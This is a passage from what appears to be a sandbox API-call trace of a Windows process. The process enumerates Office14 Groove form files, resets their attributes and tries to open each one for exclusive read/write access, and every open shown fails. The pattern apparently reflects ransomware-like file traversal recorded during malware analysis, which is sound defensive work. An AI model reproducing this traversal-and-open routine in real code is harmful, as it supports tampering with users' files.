FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.283] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.283] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsImageTemplate.html", dwFileAttributes=0x80) returned 0 [0137.283] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsImageTemplate.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms5\\formsimagetemplate.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.284] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.284] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.284] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.284] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.284] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsMacroTemplate.html", dwFileAttributes=0x80) returned 0 [0137.284] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsMacroTemplate.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms5\\formsmacrotemplate.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.284] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.284] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.284] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.284] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.284] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsPreviewTemplate.html", dwFileAttributes=0x80) returned 0 [0137.285] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsPreviewTemplate.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms5\\formspreviewtemplate.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.285] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.285] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.285] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.285] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.285] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsPreviewTemplateRTL.html", dwFileAttributes=0x80) returned 0 [0137.285] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsPreviewTemplateRTL.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms5\\formspreviewtemplatertl.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.285] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.285] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.285] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.285] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.286] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsPrintTemplate.html", dwFileAttributes=0x80) returned 0 [0137.286] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsPrintTemplate.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms5\\formsprinttemplate.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.286] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.286] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.286] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.286] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.286] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsPrintTemplateRTL.html", dwFileAttributes=0x80) returned 0 [0137.286] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsPrintTemplateRTL.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms5\\formsprinttemplatertl.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.286] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.286] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.286] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.286] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.287] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsViewAttachmentIcons.jpg", dwFileAttributes=0x80) returned 0 [0137.287] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsViewAttachmentIcons.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms5\\formsviewattachmenticons.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.287] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.287] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.287] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.287] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.287] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsViewAttachmentIconsMask.bmp", dwFileAttributes=0x80) returned 0 [0137.287] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\FormsViewAttachmentIconsMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms5\\formsviewattachmenticonsmask.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.287] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.287] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.288] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.288] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.288] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\form_edit.js", dwFileAttributes=0x80) returned 0 [0137.288] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\form_edit.js" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms5\\form_edit.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.288] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.288] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.288] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.288] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.288] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\InfoPathWelcomeImage.jpg", dwFileAttributes=0x80) returned 0 [0137.288] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\InfoPathWelcomeImage.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms5\\infopathwelcomeimage.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.289] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.289] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.289] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.289] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.289] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\LAUNCH.GIF", dwFileAttributes=0x80) returned 0 [0137.289] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\LAUNCH.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms5\\launch.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.289] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.289] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.289] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.289] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.289] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\macroprogress.gif", dwFileAttributes=0x80) returned 0 [0137.290] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\macroprogress.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms5\\macroprogress.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.290] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.290] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.290] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.290] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.290] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\PublicFunctions.js", dwFileAttributes=0x80) returned 0 [0137.292] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\PublicFunctions.js" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms5\\publicfunctions.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.292] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.292] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.292] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.292] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.292] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\rtf_alignleft.gif", dwFileAttributes=0x80) returned 0 [0137.292] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\rtf_alignleft.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms5\\rtf_alignleft.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.293] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.293] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.293] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.293] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.293] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\rtf_alignright.gif", dwFileAttributes=0x80) returned 0 [0137.293] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\rtf_alignright.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms5\\rtf_alignright.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.293] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.293] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.293] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.293] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.293] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\rtf_bullets.gif", dwFileAttributes=0x80) returned 0 [0137.294] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\rtf_bullets.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms5\\rtf_bullets.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.294] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.294] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.294] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.294] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.294] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\rtf_center.gif", dwFileAttributes=0x80) returned 0 [0137.294] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\rtf_center.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms5\\rtf_center.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.294] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.294] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.295] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.295] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.295] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\rtf_choosecolor.gif", dwFileAttributes=0x80) returned 0 [0137.295] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\rtf_choosecolor.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms5\\rtf_choosecolor.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.295] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.295] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.295] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.295] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.295] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\rtf_decreaseindent.gif", dwFileAttributes=0x80) returned 0 [0137.295] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\rtf_decreaseindent.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms5\\rtf_decreaseindent.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.296] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.296] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.296] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.296] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.296] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\rtf_hyperlink.gif", dwFileAttributes=0x80) returned 0 [0137.296] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\rtf_hyperlink.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms5\\rtf_hyperlink.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.296] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.296] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.296] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.296] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.297] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\rtf_increaseindent.gif", dwFileAttributes=0x80) returned 0 [0137.297] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\rtf_increaseindent.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms5\\rtf_increaseindent.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.297] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.297] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.297] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.297] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.297] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\rtf_justify.gif", dwFileAttributes=0x80) returned 0 [0137.297] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\rtf_justify.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms5\\rtf_justify.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.297] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.297] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.298] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.298] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.298] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\rtf_pressed.gif", dwFileAttributes=0x80) returned 0 [0137.298] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\rtf_pressed.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms5\\rtf_pressed.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.298] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.298] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.298] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.298] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.298] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\SAVE.GIF", dwFileAttributes=0x80) returned 0 [0137.298] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\SAVE.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms5\\save.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.299] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.299] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.299] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.299] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.299] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\SUBMIT.JS", dwFileAttributes=0x80) returned 0 [0137.299] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\SUBMIT.JS" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms5\\submit.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.299] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.299] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.299] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.299] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.299] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\utilityfunctions.js", dwFileAttributes=0x80) returned 0 [0137.300] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\utilityfunctions.js" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms5\\utilityfunctions.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.300] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.300] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.300] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.300] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.300] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\validation.js", dwFileAttributes=0x80) returned 0 [0137.300] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms5\\validation.js" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms5\\validation.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.300] CloseHandle 